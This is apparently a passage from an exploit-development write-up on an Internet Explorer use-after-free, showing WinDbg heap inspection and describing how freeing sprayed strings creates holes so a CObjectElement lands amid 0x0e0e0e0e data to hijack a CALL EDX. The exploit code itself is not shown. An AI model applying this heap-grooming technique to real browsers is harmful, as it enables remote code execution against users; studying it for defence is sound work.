eax=00450080 ebx=00457f70 ecx=00450080 edx=00000000 esi=0046f428 edi=028a4f80
eip=6dbd47b9 esp=021fc5d8 ebp=021fc5f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTreeNode::CTreeNode:
6dbd47b9 8bff mov edi,edi

dc 00450080
00450080 00000000 00000000 00000000 00000000 ................

ba w4 00450080

dc 00450080
00450080 028a4f80 00000000 ffff0000 ffffffff .O..............

!heap -x 028a4f80
Entry User Heap Segment Size PrevSize Unused Flags
-----------------------------------------------------
028a4f78 028a4f80 003d0000 00450d68 e8 - 8 LFH;busy

dt nt!_heap_subsegment 00450d68

ntdll!_HEAP_SUBSEGMENT
+0x000 LocalInfo : 0x003d76c0 _HEAP_LOCAL_SEGMENT_INFO
+0x004 UserBlocks : 0x028a2048 _HEAP_USERDATA_HEADER
+0x008 AggregateExchg : _INTERLOCK_SEQ
+0x010 BlockSize : 0x1d
+0x012 Flags : 0
+0x014 BlockCount : 0x46
+0x016 SizeIndex : 0x1c ''
+0x017 AffinityIndex : 0 ''
+0x010 Alignment : [2] 0x1d
+0x018 SFreeListEntry : _SINGLE_LIST_ENTRY
+0x01c Lock : 7

dt nt!_INTERLOCK_SEQ 00450d68+8
ntdll!_INTERLOCK_SEQ
+0x000 Depth : 0x11
+0x002 FreeEntryOffset : 0x603
+0x000 OffsetAndDepth : 0x6030011
+0x004 Sequence : 0xff425ade
+0x000 Exchg : 0n-53380335944925167

dt nt!_HEAP_LOCAL_SEGMENT_INFO 0x003d76c0
ntdll!_HEAP_LOCAL_SEGMENT_INFO
+0x000 Hint : (null)
+0x004 ActiveSubsegment : 0x00450d68 _HEAP_SUBSEGMENT
+0x008 CachedItems : [16] (null)
+0x048 SListHeader : _SLIST_HEADER
+0x050 Counters : _HEAP_BUCKET_COUNTERS
+0x058 LocalData : 0x003d6b48 _HEAP_LOCAL_DATA
+0x05c LastOpSequence : 0x87
+0x060 BucketIndex : 0x1c
+0x062 LastUsed : 0

The allocation of the CObjectElement is being retrieved from the active sub-segment.

Can we build up on the better of the two worlds? I think we can, freeing strings will increase our chances of heap cache usage, and as freeing a string does not alter its content, we’ll allocate a full segment and then free a portion of it, by de-allocating a couple of even/odd indexed strings from the array. This will leave the heap in the following state:

When IE allocates the CObjectElement it will end up in one of these holes, surrounded by 0x0e0e0e0e strings.

The code:

As you can see from above, the full address space covered by the base address 0x1d4XXXX is filled with our string content. Although this is no guarantee of a working exploit, this greatly extends the probability of exploitation success. So, EAX is now 0x0e0e0e0e, EDX will have [0x0e0e0e0e+70].

As the next instruction in the execution stream is: CALL EDX then you know where we’re going from here… Stage 2.

I hope you have enjoyed.

Tudo é possivel, quando o homem quer (e a mulher permite).